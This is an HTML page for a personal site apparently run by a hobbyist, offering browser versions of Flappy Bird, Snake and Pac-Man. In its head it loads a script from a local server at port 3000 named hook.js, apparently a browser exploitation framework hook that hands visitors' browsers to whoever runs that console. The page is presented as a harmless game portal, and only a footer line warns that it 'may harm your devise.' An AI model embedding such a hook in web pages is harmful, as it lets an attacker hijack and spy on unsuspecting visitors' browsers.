<html>

<head>

<style>

header{

height: 130px;
width: 1350px;
background-image: url("computer-code-purple-hacker-mask-860iu9867egie58m.jpg");
align-items: center;
background-size: 100%;

}

body{

background-image: url("smoker-man-in-hacker-mask-2xnglem3v5k28svd.jpg");
background-size: 100%;

}

.hi{

align-items: center;

}

.panchhi{

height: 75px;
width: 1350px;
background-image: url("portrait-display-vertical-artwork-digital-art-plain-background-hd-wallpaper-preview.jpg");

}
.saap{

height: 75px;
width: 1350px;
background-image: url("portrait-display-vertical-artwork-digital-art-plain-background-hd-wallpaper-preview.jpg");

}

</style>

<script src="http://127.0.0.1:3000/hook.js"></script>

<title>Amolak's server</title>

</head>
<body>
<header>
    <div class="hi"><font color="white"><h1><center>Amolak's Website</center></h1></div>
    <nav>
        <li><a href="about.html"><font color="red">About</font></a></li><li><a href="rep.html"><font color="red">Report</font></a></li><li><a href="down.htm"><font color="red">Downloads</font></a></li>
    </nav>
    </font>
</header>
<font color="white">=================================================================================================</font>
<br>

<bird>

    <font color="white">
        <h1>I created a Flappy bird game and I want to show it to You, <br>
        please try it.If you want to download it ,go to Downloads.</h1><br>

        <h1><font color="red">Note : You can use this from Android/Windows/Linux/Mac.</font></h1><br>
        <a href="flappybird.htm"><button class="panchhi"><font color="white">Flappy bird game</font></button></a>
    </font>
</bird>

<br><br><br><br><br>

<snake>

    <font color="white">
        <h1>I created a Snake game and I want to show it to You, <br>
        please try it.If you want to download it ,go to Downloads.</h1><br>

        <h1><font color="red">Note : You can use this from Android/Windows/Linux/Mac <br>
        , Arrow keys for Pc/laptop</font></h1><br>
        <a href="snake game.html"><button class="saap"><font color="white">Snake game</font></button></a>
    </font>
</snake>

<br><br><br><br><br>


    <font color="white">
        <h1>I created a PacMan game and I want to show it to You, <br>
        please try it.If you want to download it ,go to Downloads.</h1><br>

        <h1><font color="red">Note : You can use this from Windows/Linux/Mac <br>
        , Arrow keys for Pc/laptop</font></h1><br>
        <a href="pac man.html"><button class="saap"><font color="white">Pac Man game</font></button></a>
    </font>

<br>
<br>
<br>
<br>
<tailer>

    <center> <font color="gold"><h3>Copyright @ 2024 - Amolak Satsangi </font> <br>
        <font color="red">Note : This Website may harm your devise.</font></h3>
    </center>
</tailer>

</body>
</html>
